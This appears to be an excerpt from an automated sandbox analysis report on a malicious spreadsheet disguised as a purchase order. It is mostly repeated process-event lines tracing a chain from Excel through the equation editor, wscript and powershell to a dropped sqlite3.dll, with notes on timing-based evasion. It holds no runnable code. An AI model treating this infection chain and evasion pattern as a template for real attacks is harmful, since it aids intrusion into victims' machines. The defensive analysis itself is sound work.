            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: Mac Purchase Order PO102935.xlsStream path 'Workbook' entropy: 7.99908815961 (max. 8.0)
            Source: 5B430000.0.drStream path 'Workbook' entropy: 7.99892022178 (max. 8.0)
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_02300101 rdtsc 11_2_02300101
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 890Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1982Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 891Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2386Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeWindow / User API: threadDelayed 389Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeWindow / User API: threadDelayed 9571Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
            Source: C:\Windows\SysWOW64\find.exeAPI coverage: 2.5 %
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1960Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3244Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3220Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3268Thread sleep count: 891 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3268Thread sleep count: 2386 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3324Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3328Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3264Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3300Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\find.exe TID: 3448Thread sleep count: 389 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\find.exe TID: 3448Thread sleep time: -778000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\find.exe TID: 3496Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\find.exe TID: 3448Thread sleep count: 9571 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\find.exe TID: 3448Thread sleep time: -19142000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\find.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\find.exeLast function: Thread delayed
